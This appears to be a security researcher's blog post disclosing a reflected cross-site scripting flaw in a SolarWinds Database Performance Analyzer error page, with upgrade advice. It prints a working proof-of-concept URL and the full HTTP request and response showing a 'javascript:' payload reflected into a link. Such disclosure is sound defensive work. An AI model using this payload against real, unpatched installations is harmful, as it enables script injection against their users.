Just a short post from me today, bringing you a pretty simple Cross-Site Scripting (XSS) issue. In version 11.1.457 of SolarWinds, there is a Reflected Cross-Site Scripting vulnerability in the 'idcStateError.iwc' error page. This has been addressed in version 12.1. However, versions below 11.1.457 may also be vulnerable, as it is unknown when the vulnerability was introduced.
The following HTTP Request and response show how the issue is triggered and the results:
http://192.168.1.101:8123/iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f
Request:
GET /iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f HTTP/1.1
Host: 172.16.4.104:8123
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://172.16.4.104:8123/iwc/login.iwc
Cookie: JSESSIONID=112A2A7B2EA72FA03B4157A557CE93D9
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 19 Nov 2018 18:46:00 GMT
Connection: close
Content-Length: 6531
[...]
<a href="javascript:alert(1)//" class="btn btn-primary">
[...]
Users of SolarWinds Database Performance Analyzer should upgrade to version 12.1 to remediate this issue.
For more information, please see our advisory: TWSL2019-002
This post was originally published on my personal Greenwolf Security blog.